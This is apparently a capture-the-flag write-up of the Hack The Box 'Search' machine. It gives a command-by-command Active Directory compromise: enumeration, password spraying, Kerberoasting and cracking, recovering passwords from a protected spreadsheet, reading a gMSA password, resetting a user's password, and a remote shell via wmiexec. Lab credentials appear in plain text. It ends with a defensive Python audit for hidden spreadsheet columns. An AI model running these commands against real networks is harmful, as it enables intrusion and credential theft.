# SEARCH

```
nmap -sS --min-rate 5000 -vvv -p- -Pn -n 10.10.11.129 -oG allPorts
```

![](https://i.imgur.com/ujwxcnj.png)

```
crackmapexec smb 10.10.11.129
```

![](https://i.imgur.com/E6LNjRU.png)

```
┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/SEARCH]
└──╼ #echo "10.10.11.129 search.htb RESEARCH" >> /etc/hosts
```

![](https://i.imgur.com/vhfTk5Q.png)

```
rpcclient -U "" 10.10.11.129 -N
rpcclient 10.10.11.129 -U '%'
```

![](https://i.imgur.com/nuIHByI.png)

The SSL certificate is inspected, since alternative domain names can be found in its CN fields.

```
openssl s_client -connect 10.10.11.129:443
```

![](https://i.imgur.com/wikK28c.png)

`10.10.11.129 search.htb RESEARCH research.search.htb`

![](https://i.imgur.com/eRZWpoP.png)

Enumerating the name servers:

```
dig @10.10.11.129 search.htb ns
```

Enumerating the mail servers:

`dig @10.10.11.129 search.htb mx`

Attempting a zone transfer:

```
dig @10.10.11.129 search.htb axfr
```

![](https://i.imgur.com/b7FHGvF.png)

## WEB

![](https://i.imgur.com/mul4tuj.png)

![](https://i.imgur.com/OInbJK8.png)

```
crackmapexec smb 10.10.11.129 -u users -p 'IsolationIsKey?'
```

![](https://i.imgur.com/JplpOmB.png)

`hope.sharp:IsolationIsKey?`

```
crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --shares
```

![](https://i.imgur.com/TdUH3vp.png)

```
crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --users
```

![](https://i.imgur.com/RevVhD4.png)

```
crackmapexec smb 10.10.11.129 -u hope.sharp -p 'IsolationIsKey?' --groups
```

![](https://i.imgur.com/cI3HUgv.png)

```
rpcclient -U "hope.sharp%IsolationIsKey?" 10.10.11.129
rpcclient $> enumdomusers
rpcclient -U "hope.sharp%IsolationIsKey?" 10.10.11.129 -c "enumdomusers" | grep -oP "\[.*?\]" | grep -v "0x" | tr -d "[]" | sort -u > long_users.txt
```

![](https://i.imgur.com/YelfD4E.png)

```
/opt/kerbrute/kerbrute userenum --dc 10.10.11.129 --domain search.htb -t 50 long_users.txt
```

![](https://i.imgur.com/TqYvUP2.png)

All of the users are valid, but none of them is AS-REP roastable.

```
rdate -n 10.10.11.129
ntpdate 10.10.11.129
```

Sometimes the attack does not work because the DC's clock differs from the attacking machine's.

```
impacket-GetUserSPNs -dc-ip 10.10.11.129 search.htb/hope.sharp:IsolationIsKey? -request
```

![](https://i.imgur.com/Evsyibc.png)

```
john --wordlist=/usr/share/wordlists/rockyou.txt hashWEB_SVC
```

![](https://i.imgur.com/VVxn5Ej.png)

```
crackmapexec smb 10.10.11.129 -u web_svc -p @3ONEmillionbaby
```

![](https://i.imgur.com/ySpTqtx.png)

```
crackmapexec smb 10.10.11.129 -u long_users.txt -p @3ONEmillionbaby --continue-on-success
```

![](https://i.imgur.com/H7aQFxs.png)

![](https://i.imgur.com/8OH4T90.png)

```
Edgar.Jacobs:@3ONEmillionbaby
web_svc:@3ONEmillionbaby
```

```
ldapdomaindump -u 'search.htb\hope.sharp' -p 'IsolationIsKey?' 10.10.11.129
```

![](https://i.imgur.com/oSWSxij.png)

![](https://i.imgur.com/SWekSYy.png)

```
python3 /opt/BloodHound.py/bloodhound.py -c All -u 'hope.sharp' -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb
```

![](https://i.imgur.com/A9EIavy.png)

![](https://i.imgur.com/QU9X9xq.png)

![](https://i.imgur.com/y6AJ8mJ.png)

```
smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?'
smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' -R
```

![](https://i.imgur.com/so7IcU3.png)

![](https://i.imgur.com/12uLfdC.png)

![](https://i.imgur.com/YYN9icM.png)

```
smbclient \\\\10.10.11.129\\RedirectedFolders$ -U 'hope.sharp'
Enter WORKGROUP\hope.sharp's password: IsolationIsKey?
```

![](https://i.imgur.com/JfAnHHc.png)

```
smbmap -H 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' --download 'RedirectedFolders$/sierra.frye/user.txt'
```

![](https://i.imgur.com/xlDb7Mm.png)

```
smbmap -H 10.10.11.129 -u 'Edgar.Jacobs' -p '@3ONEmillionbaby' -R
```

![](https://i.imgur.com/Qx58W1X.png)

```
smbmap -H 10.10.11.129 -u 'Edgar.Jacobs' -p '@3ONEmillionbaby' --download 'RedirectedFolders$\edgar.jacobs\Desktop\Phishing_Attempt.xlsx'
```

![](https://i.imgur.com/MHHFc7R.png)

```
libreoffice 10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx
```

![](https://i.imgur.com/9B2ELoE.png)

![](https://i.imgur.com/XMf8Lsm.png)

```
unzip 10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx
vi ./xl/worksheets/sheet2.xml
```

![](https://i.imgur.com/FYpUfkK.png)

![](https://i.imgur.com/r3iwRTM.png)

![](https://i.imgur.com/mcTadVp.png)

```
zip Document.xlsx -r .
```

![](https://i.imgur.com/GI4tBeS.png)

```
libreoffice Document.xlsx
```

![](https://i.imgur.com/sUMWVtD.png)

```
crackmapexec smb 10.10.11.129 -u usernames -p password --no-bruteforce
```

![](https://i.imgur.com/J3FDQRg.png)

```
smbmap -H 10.10.11.129 -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --download 'RedirectedFolders$/sierra.frye/user.txt'
```

![](https://i.imgur.com/8t8hTDP.png)

![](https://i.imgur.com/VX4jwf5.png)

```
\RedirectedFolders$\Savanah.Velazquez\
```

```
wfuzz -c --hc=404 --hh=44982 -t 100 -w /opt/dictionary/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt 'http://search.htb/FUZZ'
```

![](https://i.imgur.com/6ltAmro.png)

![](https://i.imgur.com/o9o8XHA.png)

![](https://i.imgur.com/paAhkx2.png)

```
/usr/share/john/pfx2john.py search-RESEARCH-CA.p12 > hash1
/usr/share/john/pfx2john.py staff.pfx > hash2
```

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash1
```

![](https://i.imgur.com/nRlmZGv.png)

![](https://i.imgur.com/QnCdH7T.png)

```
Sierra.Frye
$$49=wide=STRAIGHT=jordan=28$$18
research
```

![](https://i.imgur.com/rVZELfz.png)

![](https://i.imgur.com/educSz2.png)

![](https://i.imgur.com/i9sBn21.png)

```
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA'
```

![](https://i.imgur.com/A8aS3GC.png)

```
Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
```

![](https://i.imgur.com/jwSKeBK.png)

```
$gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp
```

![](https://i.imgur.com/HwQYwks.png)

```
$secpw = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PScredential 'BIR-ADFS-GMSA',$secpw
Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock { whoami }
```

![](https://i.imgur.com/fmDAFwP.png)

```
Invoke-Command -ComputerName localhost -Cred $cred -ScriptBlock { net user tristan.davies cr4y0123$ }
```

![](https://i.imgur.com/Fouuh0n.png)

![](https://i.imgur.com/3rc5svp.png)

```
wmiexec.py 'search.htb/tristan.davies':'cr4y0123$'@10.10.11.129
```

![](https://i.imgur.com/i7qP00V.png)
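Added example, not part of the original writeup: the `Phishing_Attempt.xlsx` step above works because sheet protection and hidden columns only change how a spreadsheet is displayed; the cell data stays as plain XML inside the zip, which is what the `unzip` / `vi sheet2.xml` step exposes. This Python audit reads a workbook the same way and reports protected sheets, hidden column ranges and the values stored in those columns, so a defender can flag spreadsheets that rely on hiding rather than removing credentials before they are shared. It uses a constructed minimal workbook rather than the file from the box.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# SpreadsheetML main namespace used inside xl/worksheets/sheetN.xml
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}


def col_index(ref):
    """Letter part of a cell reference to a 1-based column number ('C7' -> 3)."""
    n = 0
    for ch in ref:
        if not ch.isalpha():
            break
        n = n * 26 + (ord(ch.upper()) - ord("A") + 1)
    return n


def audit_workbook(xlsx_bytes):
    """Per worksheet: protection flag, hidden column ranges, and the values
    that sit in hidden columns (still readable straight from the XML)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("xl/worksheets/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(zf.read(name))
            protected = root.find("m:sheetProtection", NS) is not None
            hidden = [(int(c.get("min")), int(c.get("max")))
                      for c in root.findall("m:cols/m:col", NS) if c.get("hidden") == "1"]
            values = []
            for cell in root.findall("m:sheetData/m:row/m:c", NS):
                if any(lo <= col_index(cell.get("r", "")) <= hi for lo, hi in hidden):
                    node = cell.find("m:is/m:t", NS)  # inline string
                    if node is None:
                        node = cell.find("m:v", NS)  # numeric / shared-string index
                    if node is not None:
                        values.append(node.text)
            report[name] = {"protected": protected, "hidden_cols": hidden, "hidden_values": values}
    return report


def build_sample():
    """Constructed minimal workbook: sheet1 is protected and hides column C,
    which holds a constructed (fake) password value; sheet2 is plain."""
    main = NS["m"]
    sheet1 = (f'<worksheet xmlns="{main}">'
              '<sheetProtection sheet="1" objects="1" scenarios="1"/>'
              '<cols><col min="3" max="3" width="12" hidden="1"/></cols>'
              '<sheetData><row r="1"><c r="A1" t="inlineStr"><is><t>alice</t></is></c>'
              '<c r="C1" t="inlineStr"><is><t>Example-Pass-123</t></is></c></row>'
              '</sheetData></worksheet>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet1)
        zf.writestr("xl/worksheets/sheet2.xml", f'<worksheet xmlns="{main}"><sheetData/></worksheet>')
    return buf.getvalue()
```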